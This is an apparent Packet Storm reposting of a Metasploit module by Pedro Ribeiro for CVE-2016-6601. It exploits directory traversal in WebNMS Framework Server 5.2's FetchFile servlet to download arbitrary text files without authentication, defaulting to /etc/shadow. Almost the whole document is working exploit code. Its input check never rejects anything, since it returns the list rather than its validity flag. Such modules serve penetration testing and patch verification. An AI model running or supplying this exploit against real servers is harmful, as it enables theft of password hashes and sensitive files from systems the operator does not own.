This Metasploit module abuses a vulnerability in WebNMS Framework Server 5.2 that allows an unauthenticated user to download files off the file system by using a directory traversal attack on the FetchFile servlet. Note that only text files can be downloaded properly, as any binary file will get mangled by the servlet. Also note that for Windows targets you can only download files that are in the same drive as the WebNMS installation. This Metasploit module has been tested with WebNMS Framework Server 5.2 and 5.2 SP1 on Windows and Linux.
d53e20ca4f6748cc2ecc344982adb4173a0413426b1595cb3eb67d5d845d913d##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
def initialize(info = {})
super(
update_info(
info,
'Name' => 'WebNMS Framework Server Arbitrary Text File Download',
'Description' => %q{
This module abuses a vulnerability in WebNMS Framework Server 5.2 that allows an
unauthenticated user to download files off the file system by using a directory
traversal attack on the FetchFile servlet.
Note that only text files can be downloaded properly, as any binary file will get
mangled by the servlet. Also note that for Windows targets you can only download
files that are in the same drive as the WebNMS installation.
This module has been tested with WebNMS Framework Server 5.2 and 5.2 SP1 on
Windows and Linux.
},
'Author' => [
'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module
],
'License' => MSF_LICENSE,
'References' => [
[ 'CVE', '2016-6601'],
[ 'URL', 'https://blogs.securiteam.com/index.php/archives/2712' ],
[ 'URL', 'https://seclists.org/fulldisclosure/2016/Aug/54' ]
],
'DisclosureDate' => '2016-07-04'
)
)
register_options(
[
OptPort.new('RPORT', [true, 'The target port', 9090]),
OptString.new('TARGETURI', [ true, 'WebNMS path', '/']),
OptString.new('FILEPATH', [ false, 'The filepath of the file you want to download', '/etc/shadow']),
OptString.new('TRAVERSAL_PATH', [ false, 'The traversal path to the target file (if you know it)']),
OptInt.new('MAX_TRAVERSAL', [ false, "Maximum traversal path depth (if you don't know the traversal path)", 10])
],
self.class
)
end
def check_filename(path)
valid = true
invalid_chars = [':', '?', '*', '|', '"', '<', '>']
invalid_chars.each do |i|
if path.include? i
valid = false
break
end
end
end
def run
if check_filename(datastore['filepath'])
file = nil
if datastore['TRAVERSAL_PATH'].nil?
traversal_size = datastore['MAX_TRAVERSAL']
file = get_file(datastore['FILEPATH'], traversal_size)
else
file = get_file(datastore['TRAVERSAL_PATH'], 1)
end
if file.nil?
print_error("#{peer} - Failed to download the specified file.")
return
else
vprint_line(file)
fname = File.basename(datastore['FILEPATH'])
path = store_loot(
'webnms.http',
'text/plain',
datastore['RHOST'],
file,
fname
)
print_good("File download successful, file saved in #{path}")
end
else
print_error('Module Failed: Invalid Filename')
end
end
def get_file(path, depth)
while depth > 0
file_name = '../' * depth + path
vprint_status("Attempting to get file: #{file_name}")
begin
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path, 'servlets', 'FetchFile'),
'method' => 'GET',
'vars_get' => { 'fileName' => file_name }
}
)
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,
Rex::HostUnreachable, Errno::ECONNRESET => e
print_error("Connect to the target: #{e.class} - #{e.message}")
return nil
end
if res &&
res.code == 200 &&
!res.body.to_s.empty? &&
(res.body.to_s.include? 'File Found')
return res.body.to_s
end
depth -= 1
end
end
end
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed